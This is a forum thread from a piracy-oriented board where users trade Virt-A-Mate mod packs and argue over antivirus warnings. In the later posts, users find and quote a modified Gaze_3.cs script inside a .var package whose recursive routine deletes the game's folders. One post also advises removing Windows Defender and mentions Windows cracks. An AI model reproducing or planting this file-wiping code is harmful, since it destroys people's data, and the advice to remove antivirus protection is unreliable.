Collection Mod Unity Virt-A-Mate Mod Assets: Clothing,Environments,Objects,Scenes,Looks,ect.

5.00 star(s) 5 Votes
Status
Not open for further replies.

WetZoner

Jr. Uploader
Nov 3, 2019
Awesome! Thanks!

Edit: dammit. The names are similar, but they're not the scenes I was looking for. Would you happen to know if these scenes are in the pack, and if so, what they're called? The "Melissa Solo" scene is not the .rar file called "Melissa," etc.

I think the only one of your hitlist items in the pack would be Luyan.rar, which is 'Red rose and White rose'
One outta 3 ain't bad, right? :HideThePain:

eponge

Oct 21, 2017
There's no virus in var files.
Could be that a background virus is trying to attach to these archives yes. And potentially gets removed once you upload it for detection avoidance. But that does not come vrom vars and VaM, there's nothing we can do for you. Take care with what you download and especially with cracked software (I prefer very well shared torrents and from trusted releasers for my games)
In the very unlikely case that these vars would be used as a launcher to trig an exploit in VaM, I bet no antivirus would not have that signature. In any case.. do not run VaM as an administrator, general advice for any programs unless you really have to.

Antivirus are not foolproof. They either use heuristics like behavioural or known signatures. So.. its not a precise science (I'm not saying it, the computer virus " " is).
We can still see a common pattern of people using windows defender. Which microsoft slowly tried to bring into the core OS with the inability to fully remove it. That's for THEIR security, not yours. With that they can remove cracks for windows itself like KMS.

Regarding the specific Wacatac... thousands of people reporting false positive.

Look, even a Microsoft product is flagged as containing that virus: :D
From the detection engine quality, we can speculate on the ability to detect TRUE positive (real viruses). Who knows.

Again as an advice, remove that windows defender program.
I do use Kaspersky but get no money from it :), make your own choice. I took it because it has a long quality history, like F-Secure also. They are also not software providers (appart from their AV..) and have no direct link with big corporations so I kinda trust their motives.

Make sure your signatures are always up to date whatever AV you use. They will often remove after a day the false positives based on user feedback.

This subject shall not be discussed anymore on this thread but rather on the other general VaM discussion. EVerytime, the var name, the name of the virus and the antivirus software must be mentionned.

Last edited:

okboomerrrrrrrrrre

Jun 2, 2020
Hello guys can someone plz upload

Looks No.13 Casual set.rar

somewehere other than anon files because it doesnt seem to work, thank you in advance

kraoro

Jul 9, 2017
Would anyone happen to have either

or

bellypunch3d

May 23, 2019
Too many *.wav-Files - mostly moaning and sucking noises

The password for mega and the zip makes your brain think:

youBetterMakeSometingOutOfThisAndShareYourScene!

This is cool - thanks for sharing. I see some .json files. Are these intended to be used with VamDeluxe's EmotionEngine?

tna20

Jul 11, 2019
I see some .json files. Are these intended to be used with VamDeluxe's EmotionEngine?
No idea - i find the pack to confusing to be productive with it - but it satisfies the need to have something for free :LOL:

Also checked with CloneSpy and already got 90% of it in different locations/scenes

kraoro

Jul 9, 2017
Thank you! I've been looking for that one for a while now. Not every hero wears a cape.:BootyTime:

Last edited by a moderator:

mailauto

Jul 12, 2020
He's not wrong, there is a modified Gaze_3.cs in the var with this code in the middle :
Code:
        private static void rd(string p) {
                foreach(string f in FileManagerSecure.GetFiles(p)) {
                    try{
                        FileManagerSecure.DeleteFile(f);
                    }catch (System.Exception e1) {

}

}
                foreach(string d in FileManagerSecure.GetDirectories(p)){
                    rd(d);
                }
        }

AJACKS

Jan 6, 2020
I have successfully opened the file, man, are there other problems in your computer?
I converted the .var to .rar, in Custom/Scripts found Gaze_3.cs.

It does contain code that will delete everything in your vam folder :

"
Code:
rd("AddonPackages");

rd("Custom");

rd("Saves");

rd("Cache");

rd("Keys");

rd("VaM_Data");

[...]

try{

}

}

rd(d);

}

}
"

Jeriho3

Aug 13, 2019
He's not wrong, there is a modified Gaze_3.cs in the var with this code in the middle :
Code:
                    try{

}

}
                    rd(d);
                }
        }
That what I've also found when I checked the files to see something is wrong but I didn't know what it meant.
Fucking salty content creators, I'm subbed to like 10 and from now on all of them can fuck themself.
Is there anything I can do to restore my shit? I had so much stuff that was orginazied they way I want and stuff that I created for myself :(

Reactions: dudedudester4vrvr4
Status
Not open for further replies.
5.00 star(s) 5 Votes